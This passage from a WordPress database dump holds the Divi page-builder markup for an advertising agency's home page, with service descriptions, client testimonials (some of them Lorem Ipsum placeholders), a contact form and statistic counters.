type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"P Sarvanan\" job_title=\"Managing Director\" company_name=\"Andslite\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]<p>“Excellent support and proactiviness and hunger to execute the project with novel ideas make me an all time client .”</p>\n[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Amit Rathod\" job_title=\"Marketing Manager\" company_name=\"Deutsche Bank\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]“I always feel excited with the young and energetic team of WTH, I love the innovative creative ideas they bring to every project, I share with them..”[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-08 19:41:47','2020-08-08 19:41:47','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/134-revision-v1/',0,'revision','',0),(689,1,'2020-08-08 19:42:50','2020-08-08 19:42:50','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"50px||3px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" custom_padding_last_edited=\"on|phone\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.1\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||23px||false|false\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||||false|false\" 